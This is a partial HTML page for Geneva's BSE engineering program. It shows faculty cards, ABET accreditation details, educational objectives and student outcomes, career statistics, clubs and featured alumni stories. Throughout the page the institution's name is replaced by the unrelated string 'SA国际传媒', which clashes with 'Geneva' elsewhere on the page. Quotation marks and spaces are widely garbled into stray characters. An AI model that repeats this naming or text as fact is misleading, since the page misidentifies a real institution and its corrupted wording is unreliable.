                                <div class="cropcircle border-white" id="cropimage" style="background: url('/academics/programs/engineering-general/_images/faculty-staff/_assets/faculty-dave-clark.jpg') center top / cover no-repeat transparent;">
                                </div>
                                </a>
                                <span>Dave Clark</span>
                                <div class="whitetext" id="deptTitle">Engineering Staff Support</div>
                            </div>
                                                                                                                                                                                                                                                        <div class="content-card">
                                                                <a href="/academics/programs/engineering-general/_images/faculty-staff/faculty/engineering/faculty_ian_fillinger.php" target="_blank">
                                <div class="cropcircle border-white" id="cropimage" style="background: url('/academics/programs/engineering-general/_images/faculty-staff/_assets/faculty-ian-fillinger.jpg') center top / cover no-repeat transparent;">
                                </div>
                                </a>
                                <span>Ian Fillinger</span>
                                <div class="whitetext" id="deptTitle">Technical Support Engineer, Department of Engineering; Engineering Ambassadors Network, Staff Advisor</div>
                            </div>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    <!-- end faculty region --></div>
<!-- end carousel--></div>
</div>
</div>
<script>// <![CDATA[
jQuery(document).ready(function(){
            jQuery(".scroller-faculty").owlCarousel({
                stagePadding: 40,
                center: false,
                items:1,
                loop:true,
                margin:10,
                nav:true,
                responsive:{
                    0:{
                        items:1,
                        margin:40
                    },
                    800:{
                        items:2,
                    },
                    1000:{
                        items:3
                    },
                    1200:{
                        items:4
                    }
                }
            });
        });
// ]]></script>
<script src="none" ></script>

                      <style><!--
/* TAB STYLES */ 
.tabbed-region {
    margin-top:50px;
    margin-bottom:80px;
}
.tabs {
  margin:auto;
  position: relative;
  padding: 50px;
  max-width: 70%;
  min-width: 180px;
}
.tabs input[name=tab-control] {
  display: none;
}
.tabs .tabcontent section h2,
.tabs ul li label {
  font-weight: bold;
  font-size: 18px;
  color: #c19221;
}
.tabs ul.tabnav {
  list-style-type: none;
  padding-left: 0;
  display: flex;
  flex-direction: row;
  margin-bottom: 10px;
  justify-content: space-between;
  align-items: flex-end;
  flex-wrap: wrap;
}
.tabs ul.tabnav li {
  box-sizing: border-box;
  flex: 1;
  width: 33.3333333333%;
  padding: 0 10px;
  text-align: center;
}
.tabs ul.tabnav li label {
  transition: all 0.3s ease-in-out;
  color: #717171;
  padding: 5px auto;
  overflow: hidden;
  text-overflow: ellipsis;
  display: block;
  cursor: pointer;
  transition: all 0.2s ease-in-out;
  white-space: nowrap;
  -webkit-touch-callout: none;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
  font-size: 25px;
}
.tabs ul.tabnav li label br {
  display: none;
}
.tabs ul.tabnav li label svg {
  fill: #717171;
  height: 1.2em;
  vertical-align: bottom;
  margin-right: 0.2em;
  transition: all 0.2s ease-in-out;
}
.tabs ul.tabnav li label:hover, .tabs ul li label:focus, .tabs ul li label:active {
  outline: 0;
  color: #979797;
}
.tabs ul.tabnav li label:hover svg, .tabs ul li label:focus svg, .tabs ul li label:active svg {
  fill: #979797;
}
.tabs .tabslider {
  position: relative;
  width: 33.3333333333%;
  transition: all 0.33s cubic-bezier(0.38, 0.8, 0.32, 1.07);
}
.tabs .tabslider .indicator {
  position: relative;
  width: 50px;
  max-width: 100%;
  margin: 0 auto;
  height: 4px;
  background: #c19221;
  border-radius: 1px;
}
.tabs .tabcontent {
  margin-top: 30px;
}
.tabs .tabcontent section {
  display: none;
  -webkit-animation-name: tabcontent;
          animation-name: tabcontent;
  -webkit-animation-direction: normal;
          animation-direction: normal;
  -webkit-animation-duration: 0.3s;
          animation-duration: 0.3s;
  -webkit-animation-timing-function: ease-in-out;
          animation-timing-function: ease-in-out;
  -webkit-animation-iteration-count: 1;
          animation-iteration-count: 1;
  line-height: 1.4;
margin-top: 50px;
}
.tabs .tabcontent section h2 {
  color: #c19221;
  display: none;
}
.tabs .tabcontent section h2::after {
  content: "";
  position: relative;
  display: block;
  width: 30px;
  height: 3px;
  background: #c19221;
  margin-top: 5px;
  left: 1px;
}
.tabs input[name=tab-control]:nth-of-type(1):checked ~ ul > li:nth-child(1) > label {
  cursor: default;
  color: #c19221;
}
.tabs input[name=tab-control]:nth-of-type(1):checked ~ ul > li:nth-child(1) > label svg {
  fill: #c19221;
}
@media (max-width: 750px) {
  .tabs input[name=tab-control]:nth-of-type(1):checked ~ ul > li:nth-child(1) > label {
    background: rgba(0, 0, 0, 0.08);
  }
}
.tabs input[name=tab-control]:nth-of-type(1):checked ~ .tabslider {
  transform: translateX(0%);
}
.tabs input[name=tab-control]:nth-of-type(1):checked ~ .tabcontent > section:nth-child(1) {
  display: block;
}
.tabs input[name=tab-control]:nth-of-type(2):checked ~ ul > li:nth-child(2) > label {
  cursor: default;
  color: #c19221;
}
.tabs input[name=tab-control]:nth-of-type(2):checked ~ ul > li:nth-child(2) > label svg {
  fill: #c19221;
}
@media (max-width: 750px) {
  .tabs input[name=tab-control]:nth-of-type(2):checked ~ ul > li:nth-child(2) > label {
    background: rgba(0, 0, 0, 0.08); 
  }
}
.tabs input[name=tab-control]:nth-of-type(2):checked ~ .tabslider {
  transform: translateX(100%);
}
.tabs input[name=tab-control]:nth-of-type(2):checked ~ .tabcontent >section:nth-child(2) {
  display: block;
}
.tabs input[name=tab-control]:nth-of-type(3):checked ~ ul > li:nth-child(3) > label {
  cursor: default;
  color: #c19221;
}
.tabs input[name=tab-control]:nth-of-type(3):checked ~ ul > li:nth-child(3) > label svg {
  fill: #c19221;
}
@media (max-width: 750px) {
  .tabs input[name=tab-control]:nth-of-type(3):checked ~ ul > li:nth-child(3) > label {
    background: rgba(0, 0, 0, 0.08);
  }
}
.tabs input[name=tab-control]:nth-of-type(3):checked ~ .tabslider {
  transform: translateX(200%);
}
.tabs input[name=tab-control]:nth-of-type(3):checked ~ .tabcontent > section:nth-child(3) {
  display: block;
}
@-webkit-keyframes tabcontent {
  from {
    opacity: 0;
    transform: translateY(5%);
  }
  to {
    opacity: 1;
    transform: translateY(0%);
  }
}
@keyframes tabcontent {
  from {
    opacity: 0;
    transform: translateY(5%);
  }
  to {
    opacity: 1;
    transform: translateY(0%);
  }
}

@media (min-width:750px){
    .tabs ul.tabnav li {
    box-sizing: border-box;
    flex-basis: 33.3333333333%;
    text-align: center;
}
}
@media (max-width: 750px) {
  .tabs ul.tabnav li label {
    white-space: initial;
  }
  .tabs ul.tabnav li label br {
    display: initial;
  }
  .tabs ul.tabnav li label svg {
    height: 1.5em;
  }

  .tabs ul.tabnav li label {
    padding: 25px 5px;
    border-radius: 5px;
}
.tabs ul.tabnav li {
    box-sizing: border-box;
    flex-basis: 100%;
    /* padding: 0 10px; */
    text-align: center;
}
  .tabs .tabslider {
    display: none;
  }
  .tabs .tabcontent {
    margin-top: 20px;
  }
  .tabs .tabcontent section h2 {
    display: block;
  }
}
 /* END TAB STYLES */
--></style>
<div class="tabbed-region portals"><!-- start content Tabs -->
<div class="tabs"><input checked="checked" id="tab1" name="tab-control" type="radio" /> <input id="tab2" name="tab-control" type="radio" /> <input id="tab3" name="tab-control" type="radio" />
<ul class="tabnav">
<li title="Accreditation"><label for="tab1" role="button"><span>Accreditation</span></label></li>
<li title="Educational-Objectives"><label for="tab2" role="button"><span>Educational Objectives</span></label></li>
<li title="Student-Outcomes"><label for="tab3" role="button"><span>ABET Student Outcomes</span></label></li>
</ul>
<div class="tabslider">
<div class="indicator" ></div>
</div>
<div class="tabcontent">
<section>
<figure class="u-pull-right img-inset-30"><a href="none"> <img alt="ABET Accredited Logo" border="0" class="u-full-width" hspace="0" src="/academics/programs/engineering-general/_images/dept/assets/ABET_Logo.jpg" width="100%" /> </a></figure>
<p><strong>Geneva's Engineering program is accredited</strong> by the Engineering Accreditation Commission of ABET, under the commission's General Criteria and Program Criteria for Engineering, General Engineering, Engineering Physics, and Engineering Science.</p>
<p>Engineering students at Geneva earn a BSE degree built around a core engineering curriculum that provides students with broad exposure to the field. Students will also choose a&#160;specific concentration by working with an advisor to decide which engineering discipline is right for them.</p>
<div class="center"><a class="button clean" href="/academics/programs/engineering-general/_images/dept/engineering/engineering-enrollment.php">Engineering Enrollment Data</a></div>
</section>
<section>
<h3>Engineering Program Educational Objectives</h3>
<p>We recognize that our students and graduates make choices and commitments that we do not control. Nevertheless, we state our objectives on the assumption that our graduates stay in the engineering profession and make the choices and commitments that we encourage.</p>
<p>Objectives: Within five years of graduation, graduates of SA国际传媒&#8217;s Engineering program will:</p>
<ol>
<li>
<p>Be employed in the engineering profession and, with experience, assume increasing levels of responsibility.</p>
</li>
<li>
<p>Obtain professional certifications and/or advanced degrees appropriate to their career path.</p>
</li>
<li>Be active members of Christian churches and engaged in church leadership roles, Christian service, and/or community service appropriate to their gifts and opportunities.</li>
</ol>
</section>
<section>
<h3>Engineering Program ABET Student Outcomes</h3>
<p><strong>Upon successful completion of the engineering program, graduates will have achieved the following outcomes:</strong></p>
<ol>
<li>an ability to identify, formulate, and solve complex engineering problems by applying principles of engineering, science, and mathematics.</li>
<li>an ability to apply engineering design to produce solutions that meet specified needs with consideration of public health, safety, and welfare, as well as global, cultural, social, environmental, and economic factors.</li>
<li>an ability to communicate effectively and ethically with a range of audiences.</li>
<li>an ability to recognize ethical and professional responsibilities in engineering situations and make informed judgments, which must consider the impact of engineering solutions in global, economic, environmental, and societal contexts.</li>
<li>an ability to function effectively on a team whose members together provide leadership, create a collaborative and inclusive environment, establish goals, plan tasks, and meet objectives.</li>
<li>an ability to develop and conduct appropriate experimentation, analyze and interpret data, and use engineering judgment to draw conclusions.</li>
<li>an ability to acquire and apply new knowledge as needed in social and professional spheres, using appropriate learning strategies.</li>
<li>an understanding of the biblical concept of calling, particularly of the calling to be an engineer.</li>
<li>an understanding of the relationship between science, technology, and a Christian worldview.</li>
</ol>
<p class="center"><a class="button clean" href="/academics/programs/engineering-general/_images/dept/engineering/engineering-enrollment.php">Engineering Enrollment and Graduation Data</a></p>
</section>
</div>
</div>
<!-- end content tabs--></div>
                      
                      
                      
                      
<div class="overlap-container">
<div class="section outcomes" style="background-image: linear-gradient(to bottom, rgba(145, 117, 28, 0.7) 0%, rgb(255, 187, 0) 100%), url('/academics/programs/engineering-general/_images/degree-maps/css/_images/outcomes-genna.jpg');">
<div class="outcomes-info">
<h2>Career Outcomes</h2>
<p>What Employers Are Saying
As engineers play an integral role in every industry, engineering majors quickly find employment across a variety of fields in the public and private sectors. Moreover, when you earn your general engineering degree, you have the opportunity to branch out into a specialization. This might mean solving problems related to infrastructure as a civil engineer or reducing pollution as an environmental engineer &#8212; the choice is yours.</p><div class="career-stats">


<div class="career-item">
<h3>100%</h3>
<p>Record of graduates finding jobs within their field</p>
</div>

<div class="career-item">
<h3>100+ Years</h3>
<p>of engineering at SA国际传媒</p>
<a class="more_link" href="/academics/programs/engineering-general/_images/blog/the-college/100-years-of-geneva-engineering.php" ></a>
</div>

</div>
</div>
</div>
<div class="section outcomes2">
<div class="outcomes-info2">
<div class="row">
<div class="four columns">
<div class="cropcircle border-white" id="cropimage" style="background: url('/academics/programs/engineering-general/_images/degree-maps/css/_images/profile-person-sam-spear.jpg') center top / cover no-repeat transparent; " ></div>
</div>
<div class="eight columns align-middle">
<h3>鈥淕eneva鈥檚 engineering curriculum and classes gave me a curiosity about how things work, why things are built the way they are, and what happens when they are built differently.鈥  <cite>Sam Spear 鈥91, PE, Senior Engineering Manager </cite></h3>
</div>
</div>
<div class="row topspacer">
<div class="six columns">
<h3>Be Prepared for a Variety of Engineering Careers:</h3>
<div class="ewa-rteLine">
<ul>
<li aria-level="1" style="font-weight: 400;"><span style="font-weight: 400;">Project Manager</span></li>
<li aria-level="1" style="font-weight: 400;"><span style="font-weight: 400;">Product Engineer</span></li>
<li aria-level="1" style="font-weight: 400;"><span style="font-weight: 400;">Systems Engineer</span></li>
<li aria-level="1" style="font-weight: 400;"><span style="font-weight: 400;">Biomedical Engineer</span></li>
<li aria-level="1" style="font-weight: 400;"><span style="font-weight: 400;">Civil Design Engineer</span></li>
<li aria-level="1" style="font-weight: 400;"><span style="font-weight: 400;">Development Engineer</span></li>
<li aria-level="1" style="font-weight: 400;"><span style="font-weight: 400;">Computer Hardware Engineer</span></li>
<li aria-level="1" style="font-weight: 400;"><span style="font-weight: 400;">Environmental Design Engineer</span></li>
</ul>
</div>
</div>
<div class="six columns">
<h3>Further Your Engineering Impact...</h3>
<ul>
<li>
<div class="ewa-rteLine">Graduate school</div>
</li>
<li>
<div class="ewa-rteLine">Work for companies like IBM, General Electric, and the U.S. Navy</div>
</li>
</ul>
</div>
<hr />
<div class="row">
<div class="three columns">
<p><img alt="" height="1920" src="/academics/programs/engineering-general/_images/degree-maps/css/_images/performance-worker2.svg" width="1920" /></p>
</div>
<div class="nine columns">
<p><span style="font-weight: 400;">Employers of our engineering graduates say that Geneva students demonstrate subject matter excellence and professional preparation, dependability and strong work ethic, and an exceptional ability to engage others constructively in workplace contexts.</span></p>
</div>
</div>
</div>
</div>
</div>
</div>

                      <style><!--
.academicfacts {
background: none!important;
    padding: 0!important;
    margin-bottom: 40px;
    margin-top: -80px;
}
.statholder img {
    max-width: 40%;
    margin: 0 auto;
    margin-bottom: 20px;
}
.statholder {text-align:center;}
.academicfacts p {
    font-size: 18px!important;
    line-height: 30px!important;
    color: #333;
}
.statholder h5 span {
    display: block;
    font-size: 25px!important;
    line-height: 33px!important;
}
--></style>
<div class="section" style="margin-top: 70px;">
<h2 class="center headerline">Clubs &amp; Affinity Groups</h2>
<div class="wide-container">
<div class="flexrow">
<div class="flexcolumn">
<div class="flexpad statholder"><img alt="ASCE Logo" height="113" src="/academics/programs/engineering-general/_images/student-life/engagement/clubs/club-logos/asce-logo.jpg" width="200" />
<h5><span>American Society of Civil Engineers</span></h5>
<p><span>Promoting student interaction with each other and members of the engineering profession</span></p>
</div>
</div>
<div class="flexcolumn">
<div class="flexpad statholder"><img alt="EAN Logo" height="148" src="/academics/programs/engineering-general/_images/student-life/engagement/clubs/club-logos/ean-logo.png" width="220" />
<h5><span>Engineering Ambassadors</span></h5>
<p><span>Become agents of change through leadership, conversations, presentations, and hands-on activities that explore how engineering impacts society</span></p>
</div>
</div>
<div class="flexcolumn">
<div class="flexpad statholder"><img alt="SWE Logo" height="84" src="/academics/programs/engineering-general/_images/student-life/engagement/clubs/club-logos/swe-logo.png" width="200" />
<h5><span>Society of Women Engineers</span></h5>
<p><span>SWE meets weekly throughout the semester for a variety of activities including speaker events, projects, study help sessions, and outreach events</span></p>
</div>
</div>
</div>
<div class="center"><a class="button clean" href="/academics/programs/engineering-general/_images/dept/engineering/engineering-clubs.php">View More Engineering Clubs</a> <!-- flexrow--></div>
</div>
</div>
                      
                      
                      
                      
                      
                      
                      <div class="section rfi" id="ctaForm">
<div class="rfi-form">
<h2>Tell Me More</h2>
<h3>Discover more about our <span>Engineering</span> program</h3>
<p>Complete the following information to connect with an admissions counselor.</p>
<!-- TUG RFI -->
<div id="form_2be2dbab-8b83-47e7-8aba-e43544e6c3e7">Loading...</div>
<script>/*<![CDATA[*/var script = document.createElement('script'); script.async = 1; script.src = 'https://apply.geneva.edu/register/?id=2be2dbab-8b83-47e7-8aba-e43544e6c3e7&sys:field:academic_interests=a0808834-3504-455a-9b82-4fea0b332e7c&output=embed&div=form_2be2dbab-8b83-47e7-8aba-e43544e6c3e7' + ((location.search.length > 1) ? '&' + location.search.substring(1) : ''); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(script, s);
/*]]>*/</script>
</div>
</div>

<!-- End TUG RFI -->





                      <!-- Related Programs -->
<div class="section programs headerline" id="programs"><!-- Featured Programs -->
<h2 class="headerline">Related Programs</h2>
    <div class="scroll-container flex-container">
                        <div class="card flex-item">
                <a class="" href="/academics/programs/engineering-general/_images/degree-maps/css/engineering-chemical.php"> <img alt="Chemical Engineering" class="u-full-width" src="/academics/programs/engineering-general/_images/degree-maps/css/_images/program-thumbnail-engineering-chemical.jpg" /> </a>
                <div class="card-info">
                    <h2>Chemical Engineering</h2>
                    <p><span class="ico-circ">BSE</span>
 Major</p>
                </div>
            </div>
                    <div class="card flex-item">
                <a class="" href="/academics/programs/engineering-general/_images/degree-maps/css/engineering-civil.php"> <img alt="Civil Engineering" class="u-full-width" src="/academics/programs/engineering-general/_images/degree-maps/css/_images/program-thumbnail-engineering-civil.jpg" /> </a>
                <div class="card-info">
                    <h2>Civil Engineering</h2>
                    <p><span class="ico-circ">BSE</span>
 Major</p>
                </div>
            </div>
                    <div class="card flex-item">
                <a class="" href="/academics/programs/engineering-general/_images/degree-maps/css/engineering-mechanical.php"> <img alt="Mechanical Engineering" class="u-full-width" src="/academics/programs/engineering-general/_images/degree-maps/css/_images/program-thumbnail-engineering-mechanical.jpg" /> </a>
                <div class="card-info">
                    <h2>Mechanical Engineering</h2>
                    <p><span class="ico-circ">BSE</span>
 Major</p>
                </div>
            </div>
            </div>
</div>
<!-- end Related Programs -->


                      
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      	                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    	                                                                                                                                                                                                                                                                                                                                                                                        	                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    	                                                                                                                                                                                                                                                                        	                                                                                                                                                                                                                                                                                                                	                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                	                                                                                                                                                                                                                                                                                        	                                                                                                                	                                                                                                                                                                                                                                                                                                                                                	                                                                                                                                                                                                                                                                                                            	                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        	                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            	                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        	                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                	                                                                                                                                                                                                                                                                                                                                                                                                    	                                                        	                                                                                                                                                                                                                                            <div class="section card-carousel stories headerline"><!-- Featured Stories -->
<div class="scroll-container">
<h2 class="headerline"><span>Engineering</span> Featured Stories</h2>
<div class="owl-carousel scroller-stories owl-theme">
          
       
  
    
    
                                        	            	<div class="content-card"><a href="/academics/programs/engineering-general/_images/stories/2026/01/isaac-burden.php" target="_blank"> <img alt="Image of Isaac Burden: Flying Pro Christo Et Patria" src="/academics/programs/engineering-general/_images/stories/_assets/isaacburden-header.jpg" /></a>
                <div class="card-text">
                                <h3>Isaac Burden: Flying Pro Christo Et Patria</h3>
                                <p>Isaac聽Burden聽鈥28 completed his first solo flight on October 17, 2025, in preparation to earn his pilot's license. He joined the Air National Guard after an introduction at Geneva's Career Fair and leaves for聽basic and tech training聽in February聽2026.聽</p>
                </div>
                </div>
                                                        	            	<div class="content-card"><a href="/academics/programs/engineering-general/_images/stories/2025/12/paul-hoback.php" target="_blank"> <img alt="Image of Paul Hoback:聽Developing聽Pittsburgh Airport鈥檚 New Terminal" src="/academics/programs/engineering-general/_images/stories/_assets/paul-hoback.jpg" /></a>
                <div class="card-text">
                                <h3>Paul Hoback:聽Developing聽Pittsburgh Airport鈥檚 New Terminal</h3>
                                <p>For 24 years, Paul Hoback 鈥97, MBA 鈥10聽served as executive vice president and chief development officer at Allegheny County Airport Authority, overseeing multiple projects including Pittsburgh Int'l Airport's recent terminal project.</p>
                </div>
                </div>
                                                        	            	<div class="content-card"><a href="/academics/programs/engineering-general/_images/stories/2025/11/jess-and-josh-tygert.php" target="_blank"> <img alt="Image of Jess and Josh Tygert: The Value of a Geneva Education" src="/academics/programs/engineering-general/_images/stories/_assets/tygert1.jpg" /></a>
                <div class="card-text">
                                <h3>Jess and Josh Tygert: The Value of a Geneva Education</h3>
                                <p>For Jess聽(Wilson) 鈥20 and Josh聽Tygert聽鈥20, Geneva created abundant opportunities for themselves and others who are seeking ways to serve the Lord through their vocational callings.</p>
                </div>
                </div>
                                                        	            	<div class="content-card"><a href="/academics/programs/engineering-general/_images/stories/2025/10/joel-cummings.php" target="_blank"> <img alt="Image of Joel Cummings: Engineering the Christian to Crescent Bridge on the Schuylkill River Trail " src="/academics/programs/engineering-general/_images/stories/_assets/joel-cummings.jpg" /></a>
                <div class="card-text">
                                <h3>Joel Cummings: Engineering the Christian to Crescent Bridge on the Schuylkill River Trail </h3>
                                <p>Joel Cummings 鈥94 served as project manager for the design of Christian to Crescent Cable-Stayed Bridge in Philadelphia, a vital addition to the ongoing Schuylkill River Trail project.</p>
                </div>
                </div>
                                                        	            	<div class="content-card"><a href="/academics/programs/engineering-general/_images/stories/2025/09/david-shaw.php" target="_blank"> <img alt="Image of David Shaw, Professor Emeritus: The Power of Creativity and Collaboration in Engineering聽" src="/academics/programs/engineering-general/_images/stories/_assets/dave-shaw-header-2.jpg" /></a>
                <div class="card-text">
                                <h3>David Shaw, Professor Emeritus: The Power of Creativity and Collaboration in Engineering聽</h3>
                                <p>David Shaw 鈥83, PhD, has received emeritus status after retiring from his 35-year career as professor of mechanical engineering at SA国际传媒.</p>
                </div>
                </div>
                                                        	            	<div class="content-card"><a href="/academics/programs/engineering-general/_images/stories/2025/08/delaney-winterhalter.php" target="_blank"> <img alt="Image of Delaney Winterhalter: Finding a Path in Civil Engineering聽" src="/academics/programs/engineering-general/_images/stories/_assets/delaney-winterhalter.jpg" /></a>
                <div class="card-text">
                                <h3>Delaney Winterhalter: Finding a Path in Civil Engineering聽</h3>
                                <p>How do I discover what I want to study? How do my interests translate into a specific job? Recent grad Delaney Winterhalter '25 shares how she discovered a calling and the beginnings of a career in civil engineering.</p>
                </div>
                </div>
                                                        	            	<div class="content-card"><a href="/academics/programs/engineering-general/_images/stories/2025/06/hollie-mincone.php" target="_blank"> <img alt="Image of Hollie Mincone: Crafting Custom Solutions in Prosthetics and Orthotics" src="/academics/programs/engineering-general/_images/stories/_assets/hollie-mincone.jpg" /></a>
                <div class="card-text">
                                <h3>Hollie Mincone: Crafting Custom Solutions in Prosthetics and Orthotics</h3>
                                <p>Hollie (Gfroerer) Mincone 鈥20 puts her dual degrees in biomedical engineering and missions to work as a certified orthotist and prosthetic resident, crafting custom devices for her patients.</p>
                </div>
                </div>
                                                        	            	<div class="content-card"><a href="/academics/programs/engineering-general/_images/stories/2025/04/hannah-smith.php" target="_blank"> <img alt="Image of Hannah Smith: A Journey Through SA国际传媒鈥檚 Mechanical Engineering Program" src="/academics/programs/engineering-general/_images/blog/_assets/hannah-smith.jpg" /></a>
                <div class="card-text">
                                <h3>Hannah Smith: A Journey Through SA国际传媒鈥檚 Mechanical Engineering Program</h3>
                                <p>Hannah Smith 鈥25, a senior studying mechanical engineering, has been equipped for success at SA国际传媒 through strong academics, relationships, and faith-life integration.</p>
                </div>
                </div>
                                                        	            	<div class="content-card"><a href="/academics/programs/engineering-general/_images/news/2022/03/nr-education-stem-symposium-undergraduate-poster-session.php" target="_blank"> <img alt="Image of SA国际传媒 Hosts STEM Symposium for Undergraduate Research" src="/academics/programs/engineering-general/_images/news/_assets/thumbnails/news/tn-stem-symposium-for-undgraduate-research.jpg" /></a>
                <div class="card-text">
                                <h3>SA国际传媒 Hosts STEM Symposium for Undergraduate Research</h3>
                                <p>SA国际传媒 hosts the STEM Symposium for Undergraduate Research from 6:30-8 p.m. on Wednesday, April 6, 2022, in Old Main. Chemistry Professor John Stahl, PhD, will speak on 鈥淟essons Learned in Research: Observations from Conducting Chemistry Research for over 40 Years,鈥 followed by a student poster session.</p>
                </div>
                </div>
                    </div>
<script>
jQuery(document).ready(function(){
    jQuery(".scroller-stories").owlCarousel({
        center: false,
        items:1,
        margin:25,
        dots:true,
        responsive:{
            800:{
                items:2
            },
            1000:{
                items:3
            }
        }
    });
});
</script>
<!-- end carousel--></div>
<!-- end Stories--></div>

                      <div class="section poppins apply">
<div class="container">
<div class="row">
<div class="twelve columns center">
<h2>Take the next step...</h2>
<p class="largetext">There is a place for you at SA国际传媒.</p>
<a class="button gold large normal" href="#">Apply Today</a></div>
</div>
</div>
</div>
                   </div>
                   <!-- end div pageContent --><br class="clearit" />
                </div>
                <!-- end pageContentFull -->
             </div>
             <!-- End div contentContainer--><br class="clearit" />
             <div id="footerBar" ></div>
             <div id="footerStripes" ></div>
          </div>
          <!-- end contentSpace div-->
          <div id="footerSpace">
              <!-- Footer Include Here-->
             <div>
<div class="footerGradient">
<div class="wide-container" id="footerContainer">
<div class="row">
<div class="four columns" id="footerLeft"><img alt="" aria-hidden="true" class="u-full-width" height="152" src="/_files/sitegraphics/geneva-spade-stacked.svg" style="max-width: 200px;" width="200"/>
<div id="socialfooter">
<ul class="socialicons">
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on Facebook (Opens in new tab)"> <i class="fa-brands fa-facebook-square"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on X (Opens in new tab)"> <i class="fa-brands fa-twitter"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on Instagram (Opens in new tab)"> <i class="fa-brands fa-instagram"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on Youtube (Opens in new tab)"> <i class="fa-brands fa-youtube"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on LinkedIn (Opens in new tab)"> <i class="fa-brands fa-linkedin-in"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on TikTok (Opens in new tab)"> <i class="fa-brands fa-tiktok">&nbsp;</i></a></li>
</ul>
</div>
<div class="pad20 buttonflex"><a class="quickbtn" href="/about-geneva/contact_us.php"><i class="fa fa-phone">&#160;</i>Contact Us</a><a class="quickbtn" href="/about-geneva/campus_map.php"><i class="fas fa-map-marker-alt"></i>&#160;Campus Map</a></div>
</div>
<!-- end footer left-->
<div class="eight columns" id="footerRight">
<div class="flex-foot">
<div class="footerGroup">
<div class="toggleHead hidToggle">General Information</div>
<ul class="hidFootLinks">
<li><a href="/about-geneva/foundationalconcepts.php">Foundational Concepts</a></li>
<li><a href="/about-geneva/nondiscrimination_policy.php">Nondiscrimination Policy</a></li>
<li><a href="/about-geneva/titleix/index.php">Title IX</a></li>
<li><a href="/employment/index.php">Employment</a></li>
<li><a href="/about-geneva/attribution.php">Attribution</a></li>
</ul>
</div>
<div class="footerGroup">
<div class="toggleHead hidToggle">Offices &amp; Departments</div>
<ul class="hidFootLinks">
<li><a href="/academics/registrar/index.php">Registrar</a></li>
<li><a href="/student-accounts/index.php">Student Accounts</a></li>
<li><a href="/admissions/undergraduate.php">Admissions</a></li>
<li><a href="/academics/crossroads/index.php">Crossroads</a></li>
<li><a href="/academics/index.php">Academic Programs</a></li>
</ul>
</div>
<div class="footerGroup">
<div class="toggleHead hidToggle">Student Resources</div>
<ul class="hidFootLinks">
<li><a href="/library/index.php">McCartney Library</a></li>
<li><a href="/about-geneva/campus_bookstore.php">Campus Bookstore</a></li>
<li><a href="/about-geneva/policies/index.php">Academic Policies</a></li>
<li><a href="none" rel="noopener" target="_blank"><img alt="" aria-hidden="true" src="/_files/sitegraphics/moodle-ico.png"/> Online Course Login</a></li>
<li><a href="none" rel="noopener" target="_blank"><img alt="" aria-hidden="true" height="16" src="/_files/sitegraphics/mygen-ico.png" style="display: inline-block; vertical-align: middle;" width="20"/> myGeneva Student Portal</a></li>
</ul>
</div>
<!--<div class="footerGroup">
<div class="toggleHead hidToggle">ALUMNI &amp; FRIENDS</div>
<ul class="hidFootLinks">
<li><a href="/alumni/index">Alumni Relations</a></li>
<li><a href="/alumni/online-services/class-notes/">Alumni Class Notes</a></li>
<li><a href="/alumni/events/index">Alumni Events</a></li>
<li><a href="/give/index">Give</a></li>
</ul>
</div>--> <a class="BackToTop" href="#topOfPageLink"><img alt="" aria-hidden="true" src="/_files/sitegraphics/to-top-sm.png"/></a></div>
<!-- end footerRight --></div>
<!-- end row --></div>
<!-- end footer container --></div>
<!-- end footer gradient --></div>
<div class="footer-end">
<div class="motto-margin">
<div class="pad20"><img alt="" aria-hidden="true" class="u-full-width" height="26" src="/_files/sitegraphics/motto-dark.svg" style="max-width: 250px;" width="250"/></div>
<div class="pad20">
<p class="copyright">&#169; SA国际传媒 | All rights reserved</p>
</div>
</div>
</div>


</div>          </div>
        </div><!--end .bg-blur wrap-->
          <!-- Offcanvas Menu Include Here-->
          <div>

	
	<!-- RESPONSIVE MENU ============================================== -->
	<nav id="menu">
		<ul>
			<div id="searchBox-menu" class="roundcorners">
				<form action="/search.php" class="formFix" id="searchbox_006510535078434149773:n0dixopbnng">
					<div id="searchFld-menu">
						<input class="searchTxt-menu" id="fldsearch" name="q" style="background-color: transparent;" tabindex="1" type="text" placeholder="Search Geneva" />
						<input name="cx" type="hidden" value="006510535078434149773:n0dixopbnng" />
						<input name="cof" type="hidden" value="FORID:11" />
						<input name="sa" type="hidden" value="Search" />
						<!-- <input class="searchButton-menu" name="input" src="https://www.geneva.edu/_files/sitegraphics/searchico32.png" type="image" value="Search Geneva" /> -->
						<button class="searchButton" style="cursor: pointer; background: none; overflow: hidden;">
							<i class="fa-xl fa-solid fa-magnifying-glass searchButton" style="color: #aa8228; text-align: center; margin-top: 50%;"></i>
						</button>
					</div>
